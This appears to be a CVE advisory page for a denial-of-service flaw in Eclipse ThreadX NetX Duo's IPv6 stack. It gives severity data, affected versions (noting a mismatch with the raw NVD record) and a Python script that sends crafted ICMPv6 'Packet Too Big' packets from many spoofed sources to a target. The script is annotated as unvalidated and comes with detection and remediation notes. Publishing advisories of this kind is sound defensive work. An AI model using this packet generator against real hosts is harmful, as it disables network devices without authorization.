Security Vulnerability Report
CVE-2025-55102 CVSS 7.5 HIGH

CVE-2025-55102

Published: 2026-01-27 16:16:15
Last Modified: 2026-04-02 20:30:20

Description

A denial-of-service vulnerability exists in the NetX IPv6 component functionality of Eclipse ThreadX NetX Duo. A specially crafted "Packet Too Big" network packet with more than 15 different source addresses can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:* - VULNERABLE
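Eclipse ThreadX NetX Duo < 6.4.1
Eclipse ThreadX NetX Duo < 6.3.6
Note: the raw NVD record further down this page gives versionEndExcluding 6.4.5.202504 for the same CPE, which does not match the two bounds above; confirm the fixed release against the vendor advisory (GHSA-f3rx-xrwm-q2rf) before relying on either.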

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""Illustrative traffic generator for CVE-2025-55102 (Eclipse ThreadX NetX Duo, IPv6 DoS).

The script emits ICMPv6 "Packet Too Big" messages towards a single target,
each one carrying a different source address taken from 2001:db8::/32.

Reviewer notes:
  * The ICMPv6 checksum is left as a zero placeholder and nothing on the page
    shows the listing was validated against a NetX Duo build, so read it as a
    description of the traffic pattern rather than a confirmed reproducer.
  * Detection: the pattern is a burst of ICMPv6 type 2 messages to one host
    from many distinct sources. 2001:db8::/32 is the documentation prefix
    (RFC 3849), so packets sourced from it should be dropped by ingress
    filtering.
  * Remediation: move to a fixed NetX Duo release as named in the vendor
    advisory.
"""

import socket
import struct
import random


def create_icmpv6_packet_too_big(source_addrs, target_addr):
    """Return the raw bytes of one IPv6 + ICMPv6 "Packet Too Big" message.

    Args:
        source_addrs: sequence of textual IPv6 addresses; only the first
            entry is used. An empty (or otherwise falsy) value falls back
            to '2001:db8::1'.
        target_addr: textual IPv6 address placed in the destination field.

    Returns:
        bytes: the header fields followed by the ICMPv6 message.

    Raises:
        OSError: from socket.inet_pton when an address cannot be parsed.
    """
    # Type 2 (Packet Too Big), code 0, checksum 0 (placeholder, never
    # computed), then the 32-bit MTU field set to 1280.
    icmp_packet = struct.pack('>BBHI', 2, 0, 0, 1280)
    # 28 zero bytes stand in for the truncated original packet.
    icmp_packet += bytes(28)

    if source_addrs:
        src_addr = source_addrs[0]
    else:
        src_addr = '2001:db8::1'

    # Header pieces are concatenated in the same order as the original
    # listing; next header 58 is ICMPv6 and the hop limit is 255.
    header_parts = [
        struct.pack('>I', 0x60000000),
        struct.pack('>H', len(icmp_packet)),
        struct.pack('>B', 58),
        b'\x00',
        struct.pack('>B', 255),
        socket.inet_pton(socket.AF_INET6, src_addr),
        socket.inet_pton(socket.AF_INET6, target_addr),
    ]
    return b''.join(header_parts) + icmp_packet


def send_malicious_packets(target_ip, interface='eth0'):
    """Send 16 Packet Too Big messages to target_ip, one per random source.

    Args:
        target_ip: textual IPv6 address of the device under test.
        interface: accepted for compatibility; the body never reads it.

    Every exception is caught and printed, so the function always returns
    None. NOTE(review): the socket is closed only on the success path; an
    error during sending leaves it to the garbage collector.
    """
    try:
        raw_sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

        # 16 sources: one more than the 15 named in the advisory text.
        source_addrs = [
            f'2001:db8::{random.randint(1, 0xffff):04x}:{random.randint(1, 0xffff):04x}'
            for _ in range(16)
        ]
        total = len(source_addrs)

        print(f'[*] Target: {target_ip}')
        print(f'[*] Number of source addresses: {total}')
        print('[*] Sending malicious Packet Too Big messages...')

        for index, src_addr in enumerate(source_addrs, start=1):
            packet = create_icmpv6_packet_too_big([src_addr], target_ip)
            raw_sock.sendto(packet, (target_ip, 0))
            print(f'[+] Sent packet {index}/{total} from {src_addr}')

        print('[*] Attack completed')
        raw_sock.close()
    except Exception as e:
        print(f'[-] Error: {e}')


if __name__ == '__main__':
    import sys

    if len(sys.argv) < 2:
        print(f'Usage: {sys.argv[0]} <target_ipv6>')
        sys.exit(1)

    target = sys.argv[1]
    send_malicious_packets(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55102", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:15.113", "lastModified": "2026-04-02T20:30:19.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability exists in the NetX IPv6 component functionality of Eclipse ThreadX NetX Duo. A specially crafted network packet of \"Packet Too Big\" with more than 15 different source address can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability."}, {"lang": "es", "value": "Hay una vulnerabilidad de denegación de servicio en la funcionalidad del componente NetX IPv6 de Eclipse ThreadX NetX Duo. Un paquete de red especialmente diseñado de 'Packet Too Big' con más de 15 direcciones de origen diferentes puede provocar una denegación de servicio. Un atacante puede enviar un paquete malicioso para activar esta vulnerabilidad."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-770"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.4.5.202504", "matchCriteriaId": "6498C3CB-1DAB-44E7-A3BD-D56B55629B6B"}]}]}], "references": [{"url": "https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-f3rx-xrwm-q2rf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}